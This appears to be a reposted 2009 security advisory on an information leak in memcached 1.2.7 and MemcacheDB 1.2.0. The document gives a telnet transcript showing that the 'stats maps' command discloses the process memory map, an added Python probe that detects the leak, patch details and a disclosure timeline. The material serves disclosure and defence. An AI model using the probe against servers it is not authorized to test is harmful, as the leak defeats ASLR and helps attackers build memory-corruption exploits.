Credit:
The information has been provided by Joe Testa.
The original article can be found at: http://www.positronsecurity.com/advisories/2009-001.html
Vulnerable Systems:
* memcached version 1.2.7
* MemcacheDB version 1.2.0
By simply connecting to the memcached TCP port (default: 11211) or MemcacheDB's TCP port (default: 21201) and issuing a 'stats maps' command, the software will directly pipe the output of /proc/self/maps to the client (see memcached.c:1153 and memcachedb.c:946).
jdog@thegibson:~$ telnet 192.168.x.x 11211
Trying 192.168.x.x...
Connected to localhost.
Escape character is '^]'.
stats maps
08048000-08053000 r-xp 00000000 fe:01 5934920 /home/jdog/ \
sources/memcached-1.2.7/memcached
08053000-08054000 rw-p 0000b000 fe:01 5934920 /home/jdog/ \
sources/memcached-1.2.7/memcached
08054000-080a4000 rw-p 08054000 00:00 0 [heap]
b7d0a000-b7d4d000 rw-p b7d0a000 00:00 0
b7d4d000-b7d61000 r-xp 00000000 fe:01 2555942 /lib/tls/i686/ \
cmov/libpthread-2.7.so
b7d61000-b7d63000 rw-p 00013000 fe:01 2555942 /lib/tls/i686/ \
cmov/libpthread-2.7.so
b7d63000-b7d65000 rw-p b7d63000 00:00 0
b7d65000-b7d74000 r-xp 00000000 fe:01 2555943 /lib/tls/i686/ \
cmov/libresolv-2.7.so
b7d74000-b7d76000 rw-p 0000f000 fe:01 2555943 /lib/tls/i686/ \
cmov/libresolv-2.7.so
b7d76000-b7d78000 rw-p b7d76000 00:00 0
b7d78000-b7d7f000 r-xp 00000000 fe:01 2555944 /lib/tls/i686/ \
cmov/librt-2.7.so
b7d7f000-b7d81000 rw-p 00006000 fe:01 2555944 /lib/tls/i686/ \
cmov/librt-2.7.so
b7d81000-b7d95000 r-xp 00000000 fe:01 2555934 /lib/tls/i686/ \
cmov/libnsl-2.7.so
b7d95000-b7d97000 rw-p 00013000 fe:01 2555934 /lib/tls/i686/ \
cmov/libnsl-2.7.so
b7d97000-b7d9a000 rw-p b7d97000 00:00 0
b7d9a000-b7ee3000 r-xp 00000000 fe:01 2555928 /lib/tls/i686/ \
cmov/libc-2.7.so
b7ee3000-b7ee4000 r--p 00149000 fe:01 2555928 /lib/tls/i686/ \
cmov/libc-2.7.so
b7ee4000-b7ee6000 rw-p 0014a000 fe:01 2555928 /lib/tls/i686/ \
cmov/libc-2.7.so
b7ee6000-b7ee9000 rw-p b7ee6000 00:00 0
b7ee9000-b7efc000 r-xp 00000000 fe:01 614755 /usr/lib/ \
libevent-1.3e.so.1.0.3
b7efc000-b7efd000 rw-p 00013000 fe:01 614755 /usr/lib/ \
libevent-1.3e.so.1.0.3
b7efd000-b7efe000 rw-p b7efd000 00:00 0
b7f0e000-b7f10000 rw-p b7f0e000 00:00 0
b7f10000-b7f11000 r-xp b7f10000 00:00 0 [vdso]
b7f11000-b7f2b000 r-xp 00000000 fe:01 2557432 /lib/ld-2.7.so
b7f2b000-b7f2d000 rw-p 00019000 fe:01 2557432 /lib/ld-2.7.so
bfce7000-bfcfc000 rw-p bffeb000 00:00 0 [stack]
END
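As an added example (not part of the advisory or of either project's code), the following Python check parses a 'stats maps' reply like the one above and reports which ASLR-randomised regions it discloses, so an administrator can verify whether a server they run still answers the command. The probe() helper, its host/port parameters and the SAMPLE_REPLY text are assumptions constructed for this example.

```python
import re
import socket

# One /proc/<pid>/maps entry: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)"
    r"(?:\s+(?P<path>\S.*))?$")

def parse_maps_response(text):
    """Return the /proc/self/maps entries found in a 'stats maps' reply.
    Lines such as END or ERROR are ignored, so [] means nothing leaked."""
    entries = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries

def leaked_regions(entries):
    """Which ASLR-randomised regions the reply reveals (flags or a count)."""
    paths = [e["path"] or "" for e in entries]
    return {
        "heap": "[heap]" in paths,
        "stack": "[stack]" in paths,
        "libraries": sum(".so" in p for p in paths),
        "executable": any(p.startswith("/") and ".so" not in p for p in paths),
    }

def probe(host, port=11211, timeout=5.0):
    """Issue 'stats maps' to a server you administer (hypothetical helper)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"stats maps\r\n")
        buf = b""
        while not (buf.endswith(b"END\r\n") or buf.endswith(b"ERROR\r\n")):
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    entries = parse_maps_response(buf.decode("ascii", "replace"))
    return bool(entries), leaked_regions(entries)

# Constructed reply modelled on the advisory's transcript (paths unwrapped).
SAMPLE_REPLY = (
    "08048000-08053000 r-xp 00000000 fe:01 5934920 /home/jdog/sources/memcached-1.2.7/memcached\n"
    "08054000-080a4000 rw-p 08054000 00:00 0 [heap]\n"
    "b7d9a000-b7ee3000 r-xp 00000000 fe:01 2555928 /lib/tls/i686/cmov/libc-2.7.so\n"
    "bfce7000-bfcfc000 rw-p bffeb000 00:00 0 [stack]\n"
    "END\n")
```

A server patched to 1.2.8 (or a MemcacheDB build with the repository fix) should yield no map entries, so leaked_regions() returns all-false values.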
Since neither memcached nor MemcacheDB performs any authentication, a well-known requirement is that the services must never be accessible by untrusted machines. If an untrusted machine were to access the services, any contents of the cache could be read and/or modified, and arbitrary data could be inserted as well.
Even in light of this requirement, it remains reasonable for an administrator to expect that using these pieces of software would not allow a trusted machine to execute arbitrary code. By extension, it remains reasonable for an administrator to rely on ASLR protections to thwart any potential buffer overflow attacks. Because of these reasonable assumptions, and because no explicit documentation warns users of this non-obvious feature and its non-obvious impact, this issue qualifies as a security weakness.
Patch Availability:
memcached v1.2.8 was released to address this issue and can be downloaded at http://memcached.googlecode.com/files/memcached-1.2.8.tar.gz
The maintainer of MemcacheDB claimed to have fixed the issue in the code repository, but unfortunately has not released a stable package containing the fix (see section V below for details). In the meantime, the unofficial patch found in the following advisory can be applied to the source tree of MemcacheDB v1.2.0:
http://www.positronsecurity.com/advisories/2009-001.html
CVE Information:
CVE-2009-1255
Disclosure Timeline:
March 31st, 2009: Using the contents of the packaged AUTHORS file, Brad Fitzpatrick and Anatoly Vorobey were notified via e-mail.
April 7th, 2009: After receiving no reply from the official maintainers, a request to contact any acting maintainer(s) was made to the memcached mailing list at http://groups.google.com/group/memcached/browse_thread/thread/ff92b3d1a6191e4d. Dormando identified himself as a maintainer via e-mail, and was notified of the issue.
April 10th, 2009: Dormando released v1.2.8 to resolve the issue.
April 13th, 2009: Steve Chu, the maintainer of MemcacheDB, was notified of the issue. He replied that he would fix it.
April 14th, 2009: Steve Chu sent notification that the issue was fixed in the code repository and provided the following link: http://code.google.com/p/memcachedb/source/detail?r=98.
April 15th, 2009: Steve Chu was asked when a stable release would be available.
April 17th, 2009: Steve Chu was again asked when a stable release would be available.
April 18th, 2009: Steve Chu indicated that a stable release containing the fix would be available "a couple of days later."
April 24th, 2009: An update was requested from Steve Chu regarding the release date for the fixed stable version of MemcacheDB. As of April 28th, 2009, no reply was received.